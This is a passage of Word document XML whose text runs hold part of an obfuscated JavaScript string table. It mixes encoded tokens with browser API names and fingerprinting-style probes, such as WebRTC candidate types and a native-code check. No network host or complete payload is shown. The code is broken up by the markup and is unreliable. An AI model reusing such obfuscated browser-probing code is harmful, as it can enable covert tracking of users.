      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nPHeaA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "HJo68QfVhQSNyEdOfrrsU1qkyfvGNMk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>EoY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "put", "_qpX7BGu42yZyzQ", "JAKzT_ZSaZABVIWHtXMutP5USjpB", "jweAR_prZp0wFMKJoQ", "EQGAF80", "u6Bh-VzS5w", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"0qI6u2-7", "l70P41SyqF7drQx1Xg", "svhHmzeIhDz343QVf_zJRmPs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>wQLdEoo_Wdk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Ty-WH-0","bdR_vA2O72zFrWAIVMA", "O5td03mfngeezlNtTOGlFHHCt50", "a6Nz-xA", "sort", "Uint32Array", "8a4XrHLu2jyprXsGXvaCMHywm9uUPb1zkk8mCsnDJ6lwI8STxcDgj2-HQYxwBVxB0Y1bz-8K3WEVy2Ft00WlgHrW", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CmSVMVITOdSY_g</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Zo9J3XWQjgmt8XNiZ9c", "J3-tRMhNFtpZR5o", "kr9zyyS6x2K9-g", "VBOzZMFmE4A-T5vJrxsz05wFQXpL_VyFRqKUh21n0w", "oQOeBf5QMKAocg", "ibcb40f40yag1SkoD_uCCg", "some", "zsNi7zTttE-fiRJUfYfnTHrE7L2tK54", "6_hjwg6Nq3bQhkZ_aKA", "H6g13VzO8QySwg88", "4rUYhg", "3D3oYtwSHQ", "ufkUuGztqwPJ9Cl3Wqs", "oa4og1Xa", "-3T4UIgSMtsKYILwpgRv1ZY", "W90", "x1XkeLoiWv1QENqK", "fuIPj23Agg-7qiBf", "sQnlRLAOGsE5BIKKrQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Cm6UB51hdYI", "body", "UGI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pXTI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "kcEWx37doRfW9z9oWA", "0Yx3zxOB", "5OIanWPXsxbE01dMYczzFkmF", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zuE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "call", "OBLVRKE", "C45wvQGHi1KCyCsABd7UEmM", "hLRk5BCxkgyQ", "J2rbQKdRFcsFH5L71Qpy6Ot2URMViS2z", "-WquLso5XIprfOvo", "ucxDrx2hjk3ipWJiQo3SWRilsM2nK_4qhw", "d95whQOTqknZh0F4ew", "px0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>teFm_UbwlXzSng</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Reflect", "floor", "QrpV6jzRpiaW92pRcA", "pYsuvHvtkweZ1ltnKbLyVAKI", "6\uFE0F\u20E3", "NGXffrUiR9pGJA", "a9704418b7c42678", "oijSF7UbbOISJu6P1W1HtNR0KUEshD32PJX_9zpYskikykESSC1LS5ge_W3Bq4LgEw", "Lfw04kThix_D2wANPOKyH17U0d2IN9wahG4", "\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uFFFD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>{}", "clear", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>innerText</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go18shuvknmF_A", "jZBdxSSIzm6R9CYxRLCbdgP2o5DSUvs", "YJlDyDePiWik8xUeBtuJIHE", "d6Za_jK_-02Kq3A_Eg", "7huIVudaQe8kKrvbjCgbg6IhZVVq", "jYJw4mA", "TcMGiEX_0wzRzC0", "6ZYvlFHX5AixiWc-bN2qLUyLuMCw", "yOx7jROTsWzRkEAMYNg", "k7ZfwyCK_nXJ-g", "b9Agj0ninzi0sT0Wa8WhRSPZ", "_HW1Isp0JoB9", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hUrFUrY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "rcNznAixsRmcgREgW6z1", "-7cGxmHayWbA5nwgWcmBOmTq5c-QWfhqihAHUPnlb6QJQq6M_Z_QjlvwN70eNB0y", "Ij69UMtdbZM", "E80CymnN-jbMuQ", "ChLqYowsfbQQRYHK8w", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>getItem</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "DAq_KtBhCp9B", "OkzZWLBJVN8lJ6Sr4wxI_vJsQg4", "d8wx-lv-7inSvlI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>host|srflx|prflx|relay</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "LB2XYORpTA", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lF_ccdZFWA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cgs", "complete", "zEmUCOVVUqRSKb6hl2MT", "mcA1vkDj7xaYwFA9Pf_vVRiOr_usMNwZ1w", "rif6eQ", "width", "vT7OBqMcIPsAYoXAwU1aoQ", "data", "9BfnFIpTXsUoB-OXsQ", "U8hWjiKAgQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parentNode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ssADyyXfiiv_73Q", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>BgzjaYYyDdIBSQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "ZxfBULQVVP0pYbyixSUI56FnJRdPyWGy", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uhiUJg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "yxOcO78uCu8uDIjR", "JAD7Xpp5TNBQUdy5pVFB0cU_MS8-lUHbCw", "BYdN226SiQeV8nltac4", "RzT_PZA3L8lcW4o", "vXLVPLJgYJckRtu3tm5R7-Z5HQ", "5AaiC853Xw", "qW-_eth2AY9oWdGYvEdkjcdSESwNqhvSBLnNnSQ5iD7prE14JyM0abxxilfrhauZcHLbVXvlM4bKFNftf6VMXYFWcBjSyZoEs_qj-CyLlk46jz4OvjUfixEe1bBWLyM11AFKkTxyGFChmb9NA5HTQnOkguW46szh51YpbGh4G3yNk5hlWyuGpTTT62ofOKqPM3GsJS4gQWOPxEgcCjOglae43cTPI50STLl_lszMHlbZlYjdDyRJ0zY</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>", "4W6sZb0", "Ud8LkALOwlPlpDkXPZzNfiqp2P2D", "yLcKg1bFsAE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>svg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "MH-mP81CVJk", "2rIU0WTI3iOZvyF-S5jKfiWi4djhW_x4-xJxI_uVaNULQame-I3Hi0yBfrsaYgFm285litcK32Ig-QhBj06ms177lfgyY2WvD0R8VMNncqTXUJL-Vd_xOs6zMFC2hdyeaL-VPdOe_LpMRhOi73U5r6wJZwVYQDNKW-j2wIqJ-5B6cX2LhIdoR8QkDZvAlUN_wNtTjpKens9tNajw_dFFe3gUMyY_1HvjrFWSYT0g8bk_ZFdw5tS6eZwnwwcSoyur4LTN_Us7DAuSXKH_fb8oNm2cNrZHChdDbcnOqCR-H7zPK0v41BFq4f3fTNc-gBFEcmUDUH0Nw3w8RJ8wVVnD5aicumkgkIcT8_0KUiMMqnpYA5XVV_xpiuTkYLcfOhNGfaxda_f5Oe2XsvzyraMqYfd4YWM8ZIJPWX8bT5Qj-o86eFuKyT1po1K_wQydaWwJAlZ15DzxTs_up35x5BSVIBLNSwVtA0X-soOvyMxyGd0lUr1saX_zDTPe5M69GkMDHYrd8p3kK5B80c24B2KxwWRGESTiex6redfeKWGn4YslXgsWuw6WpEJIDgSrV7nu2qi3LOnSouDBv5y0GKoQM1rEMTyOyg6CFMkFUBbRxvHOVC0DkMhEyGP2KTa6IzhkWlfiG1j7MD0SnwuHpMcrRBOmhDOPnKDpdcZPXPgER_oDtZVgL7iyJeVArmBjNdoG0GRyqrd0af1I0Z9o9fFO2g-c-Cqc_YPqCcXJBnwlCsYuD_J0zIq7B5Df90gUYx1xHu2C4sP8P0VDpTAMrU1tIHIX_eEgtB-vHWOS7C9TqlzfAi_-3538dszBf_eLsuPL", "JJN32A-Ht12-hwQ1C-qTI0G3pPGKdeR2gw5dQKyidq87dbiSkLA", "8D-SIrkt", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UIEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hV_pN50", "-k_kGb4aQN5eQNfq_zo", "elHAOfhQRcAsOJif3g", "LhesdeF6WpocDMCyjzd-x40Q", "NALlSco4cw", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SubmitEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "FALSE", "L-w6", "__proto__", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "hvFLuD70zmyDz28QBg", "80", "KgiAaO59R9AycrmDmVgFoMdxUw", "D6cA8jg", "s8xXkxWj", "TV-EJ-oPM7BcAOLj6itW", "Vst8vQSgz0_wqkEXbN73Cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeEventListener</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EK0fy03e", "YLMJvnny_jWXsk8QQA", "fQiOKPZ1FLsFCbrf2FoHstosXygWuCKSBA", "\uD83D\uDE0E", "_jqSTO5LQOk1", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>removeChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "UGTEI5p0eo0", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>oEueBKhsMKVMdqE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x9Uv6kjmkR_v3QZdc66oVCeY2anKftIjh3FFUaS3F7YWYee1_O3rs3WpRg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>lLkggXWN_Tf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>_", "7_RV5H7ynzaSxk1ZI8SyTmem1g", "unshift", "z9cngRSLxwbX5Wsncw", "join", "MxuHVr8", "g_BIgD2e_GGkgSZVGoW7", "xsE41lzKmEvKhVFkfL_ofzOLsLzXQc8foj9RaN_hWpR2arz_upyMuAv5a_UFFgAmo7Yf25poxyIBkjpszEI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>phTGBoA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PFWgNNJiUOZhSNU</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CaUlx2XXyAmW", "xcwXq27T6TLs_g", "v7ZJx1-Tigk", "_kuzK9dOeYJMY8Kf", "QT-oP9tIMIUL", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fireEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>detachEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "cos", "29gvq1r3lQPv", "length", "g_F7yCmlqlLbwG8", "D6YnlWrl8w", "LRLMTYU4Fus", "BFawKMF2cJ9BUM2Ip3I9itxbZz0ysxGPRe7esgA9gwO3oE53DChxKe9Fi0_qk9WONyjgNzzoYbCME6T3ObU", "YqFIunXFvS0", "kdJ-kCa0hHbD0QI", "9_gq7kn62Rbc", "Pq4dkyXB_zGG2gR8aOngEXuN", "ITTVfKM8I-M", "T2fc", "lxa9a59ZFdBATt7v22U7ntRLUnEr80eHNuLt-g", "J88uxn66", "rO4Wwg_1nSrD9j0", "OginKcB-DpcIQffNvTl-1aIA", "2j36OZYx", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TATsWZgTF_ksCsk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "which", "8Z8DkBy47BS5kWxVHt6CcCnJsuaGHNAuv2cg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>isFinite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "CowoiE3w9QSGkEM0S8U", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>yFHcXIY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "4gL6ZIkTMv44QIiS3GMtsOxlNCo-", "VHnNef8UE5ZTCfE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>JRPcVrw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"vs1HhQGKjCPJ7GYFf-DYcX75koSnDg", "V9pPuAe2zizXoGs", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aqUexmiN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "start", "QmrhA5gOKw", "uM9b4iao1n3nqS0ORqbeaBOogcLOcfI43w", "33GIQ_tAWaNrKOaztUIuoehs", "performance", "console", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>decodeURIComponent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XTj2XogcT5ISG9-TsRYzjdEeMXc", "6jy9dcFbdg", "mr1BtGLEjQ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>axg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "iTPoeZk0LPstSA", "2hv-DY0DGqcZAs_mtWgs", "replace", "JluJSIZvLZxPdrTvu29Cp_t8Kjwk0T8", "Ftgei2PYxwXfpzMx", "left", "S9g53gSqsDvO5z5FBw", "OXuUFNB3X615QerGqSp68g", "ZlOte8pHOaZ_SaLBgB4V1rYx", "gsI-pF345wnYpAMUP9A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charCodeAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "1-5v_hXqo0A", "tWesfvtkIZhBX4i1uEs3ndBLVUIvrl4", "Uf8hnVG8", "IlTGXc5yPc5qWY2i1w", "-JEnhiKZ9GHKqBYEWKTUMwfXkObLOQ", "nDW2MsBlKLASDoU", "LP1cyTGU9mbbvX4nTP4", "7z2QUcBAYYQENPa7uw", "0-oi2GChgwE", "tLxPykuRskq2owNRXQ", "^https?:\\\x2F\\\x2F", "m1a_T4VDfJxWBJHBkGo", "c6xj2BGP2k-SglcGLcurGEiJqfOhAoBZp3wUJcmyfNI", "6vE8xHbFsHP0", "X4EyvHOy4jjm6mA7JuCYPQ6CsvD9", "1wH_EYYRDos", "Y5dcuWvEsCP_kipOH8WIehW_h97wTYpppRc", "-_cGwHvugBrYxQphPK65egiU-fTPBw", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ALafvxP</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "JoAerg8", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>SErfHKI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "L-MOlkflqwjd9CQzfMmibjzx5dDwBqAuug", "LZN-rwm31l-Nk0wDPNTgFUT_iemJLg", "mN9ukDuLlUrZh0sS", "split", "TRUE", "P6U6iHnc-VuoiSIn", "rUDgfI05SuxqBcOb5w", "_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xnkMOwsD</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-QA", "8y2WPMViX7woO8-Q33EPp_E7EXkfqzT2Ag", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WjnwZtwe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>eZQXvHrlnyk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "fYg5sH0", "description", "r8dU5CGmjg", "szHoa9cLF44QbNvf13kvig", "Jcpx-yD9jEq1", "d9w", "c5l66wm14Q2t", "aC-XFdxdYp8", "zyLEJ6wwIrMvJP_RikUZj8VtGAsutSzpBpn3ymg", "AhWuE511EK4HebbU8zB8kocLSA", "VIYx9k-EjQaa41g", "oHneEeAkDrlQeLzb9nNc5ecwMRUlhzL-YN3g9X9Erl4", "L0-1IsZ2Pr9gG5mZoypo-aUQKC5j4ULUc5S08G13zwM", "OYgF91bz2iSl9CQB", "done", "3zD2NIA1Ug", "qYMh03jhySI", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>initCustomEvent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Uint8Array", "create", "Intl", "(?:)", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>unescape</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "di-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>TXupMZZA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "EX7iAQ", "mark", "gnvzO9c", "p4EC7nb-", "rY9n7AE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sjTceA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "zNMWnX_KkDLh5g", "\uD83D\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uDCCA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>jYxHyAE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>zkbjQA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "mYMHkVHZ42SNsjEB", "1tVSthGkjw", "log", "head", "push", "constructor", "sin", "fs4knQ_B-Abh4X89P92qSWb5_a6TDQ", "uEHlbIswK7F8V9vL4ldnhYg", "2bMV0GXJ3yKTojdKC6SReCSv4_GnX_9uugA2bpvnMJFNGPzfj_-akEGeKJJqdQJ3gMQjxo9-2A", "6pdJn0yI6CuwungsHpKdfzk", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>AvNA</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "3M4V932vszHn9xg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>boolean</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "8AvjZ5k", "Xgb_f-0tCvQ7GQ", "KEzYL4kJOs9kZob8jA1f0aZuOzV68FXc", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>NkKvQcZRQuBLTY</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x", "Rw6bN4JAaaMvC9uNpQE61w", "FO1mhwDM4iCDwHEeEpHyXw", "lTTSMbwrPOQjOO_n1VgVt9R-FExG8ySwDYyo4QcZ_Dg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>charAt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "imnhLZE2QcJcHA", "1", "cl3kFc9IHvtm", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DNEKhBLR-Hrvkg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "SMlA9UGJiV7NwThnR-vbLCmjjsKt", "0FnNSoYwP5RHffvo2m4", "3i_Ra7cqIe8mMLek", &gt;&gt;     var g = ["</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fromCharCode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">", "p2OdCdJjYo5AVq3VnWcz579u", "owuuWpM0VbA2Iv7tqnVh1JoEOUgQ8kSXRovK5Dcmuw", "_fI43x6o0WOT2E0ueLziHA", "ckjUauR6W752VQ", "ClyafP4TOrlk", "2Ypz-iaCjG2lmUsAVKLFAlGanuXaeNgfkDE7cMvORQ", "zNlb-nqt-mz4uw", "I3uSbfxzJQ", </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iudGmg</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "{\\s*\\[\\s*native\\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>s+code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>\\s*]\\s*}\\s*$", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>fyTldsREXQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>CdsUiA-ZxEfxiic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "x7VfgHDUsmit_QUp", "VTCaefR0WQ", "PIUjxkHUqBmWigYCMer4T3SB47k", "NHfjbshWBP9ObrY", "application\x2Fx-www-form-urlencoded", "PZsu5Brjvyi59HBj", "Y2WQUft6DZZYH4TtvSc6", "MHE", "^(?:[\\0-\\t\\x0B\\f\\x0E-\\u2027\\u202A-\\uD7FF\\uE000-\\uFFFF]|[\\uD800-\\uDBFF][\\uDC00-\\uDFFF]|[\\uD800-\\uDBFF](?![\\uDC00-\\uDFFF])|(?:[^\\uD800-\\uDBFF]|^)[\\uDC00-\\uDFFF])$", "SmLeB7IDDb5zfA", "uFWxBehfSKN6Sp3ktl0UzA", "fEiFXd1E", "ORuFDtNFO4k_Yg", "MnC6NcJ7LcsCGc_OsjsthJpUME4-oFXPB_E", "wC6We9lmWJ4cEpSj8mxy0vE8", "Ib5J1TiEjniowzZ-CIzLXzz7nNuJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>MDyCecdmWekWbrytiQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "24RBxzOJziCX7A", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>setTimeout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "aAOzO_0faKlMRA", "vELqZ5suX9FSAQ", "5803ol779AbH8kgXKf6kAEPV6J62N5EX7WRZNY6y","\uD83C\uDFF4\uDB40\uDC67\uDB40\uDC62\uDB40\uDC65\uDB40\uDC6E\uDB40\uDC67\uDB40\uDC7F", "gw24PM0oOtMJ", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>onreadystatechange</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "QnegWe5abZtfVg", "name", "JmWMSexUJZwJbaT_1w", "49V6ukuOv1z20kc6E4ekUx7U3rvLdNMK2mRfC9ygXLZwYPa57pfytyXhCo02dw", "oz3IP-9OcA", "DRjjA8xoGA", "yKEJl3rHgDKm9XsyAofWbHO6zo_DRf5u5xM6Ss_VPq1cEvHQ8LnQ0VHzYadGbwhnj8Ap18xAh29z5VoNhVe3sH2ez6JyYGnp", "0MsnwV-MoS_W7zV4QeXXUB2WqZWNNN8", "bg-Vau5CV4w", "l5AJkXjO", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>LGuPQQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "qmu0ceZsNL9VDI-5j0ot", "domain", "d1GNMo9ETsZwPLmPuA9M", "crEN-zrDwWjs_WZNK96PM0Gh2JaQJa5lwg", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ReferenceError</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "Go0e2HU", "is9ArjOnlDTqp25SRYPdcBa3lI3YYf49hgFkSvzZY7RVZsPZw7D012aHEcQ2JT8DnZIQ56NW_AF46w", "W0OnYpZGYdQQUciNrWtxm6lDEThq5xHWcq-m43o", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OffscreenCanvas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "33_S", "a4tisxylnnDt8xg", "iPMOj2HK0ho", "Z5EqgH7f7wE", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>parseInt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>", "XHzTRPMYBMVqIe2jnhYX7o9jUFVL2X68KuDWzW9I2miP0yc-OEFMDZFg1jiJyri5VU8", "IkqgUcAXJ6lBbw", "WZ0OlGbexQK2-j82X8yCOV_2gYWdA69s-3UKC_qTAKkaBf35_5GazEisQ_1dG2lphNR_wc4Qh3kj9E96tx3m_SXVr-o6bHDiB386POlIXe3BFYGrFav0EPb-QXI", "5zTEcNYre5V0OA", "jXLxUZQ-bMNuevW5tz1o1qRV", "D74", "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bDKbeclZUqkceQ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
